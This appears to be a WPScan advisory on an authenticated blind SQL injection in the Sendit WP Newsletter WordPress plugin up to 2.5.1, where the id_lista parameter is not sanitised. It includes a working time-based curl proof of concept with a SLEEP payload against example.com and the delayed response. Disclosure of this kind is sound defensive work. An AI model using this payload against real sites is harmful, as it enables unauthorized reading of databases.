WordPress Plugin Vulnerabilities
Sendit WP Newsletter <= 2.5.1 - Authenticated (admin+) SQL Injection
Description
The page lists-management feature of the plugin, available to Administrator users does not sanitise, validate or escape the id_lista POST parameter before using it in SQL statement, therefore leading to Blind SQL Injection.
Proof of Concept
time curl -i -s -k -X $'POST' \
-H $'Upgrade-Insecure-Requests: 1' -H $'Origin: https://example.com' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Referer: https://example.com/wp-admin/admin.php?page=lists-management&delete=1&id_lista=1' \
-b $'[admin user]' \
--data-binary $'id_lista=1-IF(MID(VERSION(),1,1)=8,SLEEP(10),0)&com=DEL' \
$'https://example.com/wp-admin/admin.php?page=lists-management'
Response:
<div class="clear"></div></div><!-- wpwrap -->
<script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
</body>
</html>
0.01s user 0.00s system 0% cpu 20.279 total
Affects Plugins
No known fix References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-27 (about 2 years ago)
Added
2021-05-27 (about 2 years ago)
Last Updated
2021-05-28 (about 2 years ago)
WPScan 